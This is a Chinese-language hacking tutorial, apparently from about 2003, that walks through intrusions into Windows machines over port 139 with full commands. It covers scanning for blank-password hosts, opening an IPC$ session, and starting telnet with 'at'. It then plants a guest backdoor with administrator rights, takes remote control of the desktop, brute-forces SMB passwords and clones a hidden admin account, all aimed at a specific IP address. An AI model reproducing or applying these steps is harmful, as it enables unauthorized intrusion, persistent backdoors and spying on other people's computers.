今天打星際,被一高手反覆摧殘,鬱悶ing……於是上網活動一下。打開肉雞獵手,在開始IP和結束IP中填入想掃描的IP端,點擊開始,不一會兒之後,兩臺肉雞出現在我們面前(圖一)。
現在,讓我們點擊“開始”→“運行”→cmd.exe,打開可愛的命令行窗口。
輸入:net use //218.80.236.37/IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,現在我們就建立好了IPC$(遠程管理連接),
再來,取得遠程主機時間:net time //218.80.236.37 顯示: //218.80.236.37 的當前時間是 2003/5/22 上午 10:32。
然後用at命令啓動遠程主機的telent服務,at //218.80.236.37 10:32 telent,方便我們登陸遠程主機。(注意! 建立IPC$連接和登陸遠程主機是截然不同的兩個概念,建立IPC$是爲了能夠使用at 命令來啓動telent服務,幾乎所有的命令都是在登陸遠程主機之後使用,否則都是對你自己的計算機操作。)
然後,telent 218.80.236.37 23,出現如圖提示窗口(圖二),敲入administrator 回車兩次,出現了命令提示符,現在開始我們敲入的命令都會在遠程計算機上執行。先輸入net user 看看有哪些用戶,這裏我們只發現了administrator,guest,Iuser_KiKi三個用戶,考慮到下次進入該主機時用戶可能已經更改了administrator 的密碼,爲了能夠順利地再次進入,我們需要留下一個小後門。
通常我們會這樣做,
輸入net user guest/active:yes 激活guest 用戶(guest用戶系統內置的,因此每臺計算機上都有,默認禁用此用戶)。
net user guest 12345 更改guest的密碼爲12345,
net localgroup administrators guest /add 把guest的權限提升爲管理員權限,這樣下次來的時後可以取得對遠程主機的完全控制權。
留好了後門之後,你可以好好地在他的機子上逛一圈,看看有沒有什麼有趣的東西,順便把你剛學的命臨實際操作一下。如果你覺得命令行實在不方便,那麼跟我來,我將帶你進入豐富多采的圖形界面。現在,在命臨行窗口下輸入exit,顯示“斷開遠程主機的連接”,我們用exit這個命令離開了遠程主機,回到自己的機器上,點擊載下來的DameWare,出現如圖所示界面(圖三),在"host name"裏填上對方IP,輸入用戶名administrator和密碼(現在密碼爲空,所以不填),點擊"Connect",然後等待DameWare拷貝文件,啓動服務等一系列動作完成。一會而之後,出現如圖(圖四)窗口,裏面現示的就是遠程主機的桌面,別人的一舉一動你都可以看見,你還可以接管他的鼠標,是不是挺有意思的呢?但是記住,我們是來學習技術的,並不是來破壞的,所以千萬別做什麼壞事哦。
文章寫到這裏就告一段落了,其實對於入侵實例,有幾點我想特別提一下:
(1)肉雞獵手只能搜密碼爲空的主機,所以只能一開始讓我們練練手。一般要對139端口攻擊,我們使用SMBCrack這個軟件,它是針對一臺主機進行密碼的暴力猜解的,速度非常快,在我機器上猜了24萬個密碼只用了半小時左右,命令行窗口下輸入smbcrack 218.80.236.37 administrator words.txt 139 就開始猜解密碼了。218.80.236.37這裏改爲你要攻擊的IP,words.txt是字典,裏面含有很多口令,你可以自己上網找找,好的字典能提高入侵的成功率。
(2)telent上對方的機器後,我們爲了更加隱蔽地留下後門,常常使用CA.exe,CA是(clone administrator)的縮寫,看名字你就應該知道,它可以把其它用戶克隆成管理員,CA.exe //218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成爲管理員,密碼是SetNewPass,克隆完成之後,一般是無法發現的,所以隱蔽性非常高。
(3)at 這個命令有點搞笑,很多人先net view //IP 看了時間後,再用at 來啓動對方程序卻常常失敗,這是因爲很多人都不知道,用net view //IP 得到的時間不能直接用於at,這涉及到+12的問題,如果你看到對方的時間是 下午 3:00,那麼at 應該這樣使用at //IP 15:00 telent。
好了,就說到這裏了。相信看了本文之後,各位都能夠成功地對139端口進行入侵,至於進去之後做什麼,各位就自己發揮吧。